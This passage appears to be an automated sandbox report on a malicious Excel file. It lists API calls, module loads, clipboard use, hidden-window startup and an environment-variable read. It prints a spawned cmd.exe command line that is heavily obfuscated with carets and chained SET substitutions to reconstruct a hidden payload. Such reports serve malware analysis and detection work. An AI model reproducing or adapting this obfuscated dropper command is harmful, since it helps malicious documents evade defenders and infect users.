^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) ) | os_pid = 0xb1c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (164)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc690000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee5ac0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fee6ab0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feffd80000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee5d60000 |
|
6 | |
| Load | kernel32 | base_address = 0x77b20000 |
|
4 | |
| Load | user32 | base_address = 0x77a20000 |
|
4 | |
| Get Handle | Unknown module name | base_address = 0x13f510000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fefa750000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | USER32 | base_address = 0x77a20000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feffd80000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
3 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee5bc72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee5b360b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee5ae1a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee5b35f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee5adf000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee5ace860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee5ac3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee5ad2380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee5ac7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee5ac7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee5ac8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee5c03260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee5c03280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee5ad1f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee5b36370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee5b24590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee5ac55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee5ad0240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee5ac3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee5ac6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee5ac3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee5ace6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee5acdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee5ac7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee5acfcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee5ac8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee5bc2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee5ad42c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee5ac3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee5acab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee5aca7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee5ac1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee5ace830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee5ac13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee5ac6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee5ac1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee5ac3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee5bc71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee5b96d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee5c098e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee5c09830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Get Address | Unknown module name | function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Get Address | Unknown module name | function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee5acfcd0 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x0 |
|
1 | |
| Get Address | Unknown module name | function = 600, address_out = 0x7fee5e64ee0 |
|
3 | |
| Get Address | Unknown module name | function = 595, address_out = 0x7fee6072a6c |
|
3 | |
| Get Address | Unknown module name | function = GlobalAlloc, address_out = 0x77b280c0 |
|
1 | |
| Get Address | Unknown module name | function = GlobalLock, address_out = 0x77b6e760 |
|
1 | |
| Get Address | Unknown module name | function = lstrcpy, address_out = 0x77b6e160 |
|
1 | |
| Get Address | Unknown module name | function = GlobalUnlock, address_out = 0x77b6e570 |
|
1 | |
| Get Address | Unknown module name | function = OpenClipboard, address_out = 0x77a45a70 |
|
1 | |
| Get Address | Unknown module name | function = EmptyClipboard, address_out = 0x77a3e3c0 |
|
1 | |
| Get Address | Unknown module name | function = SetClipboardData, address_out = 0x77a3e43c |
|
1 | |
| Get Address | Unknown module name | function = CloseClipboard, address_out = 0x77a45a50 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
Keyboard (25)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_ESCAPE, result_out = 0 |
|
25 |
System (24)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 571, y_out = 556 |
|
1 | |
| Get Cursor | x_out = 333, y_out = 238 |
|
1 | |
| Get Time | type = System Time, time = 2018-11-06 08:01:09 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 117640 |
|
1 | |
| Get Time | type = Local Time, time = 2018-11-06 08:01:09 (Local Time) |
|
5 | |
| Get Time | type = Local Time, time = 2018-11-06 08:01:12 (Local Time) |
|
2 | |
| Get Time | type = Ticks, time = 288570 |
|
9 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #3: cmd.exe
119
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , 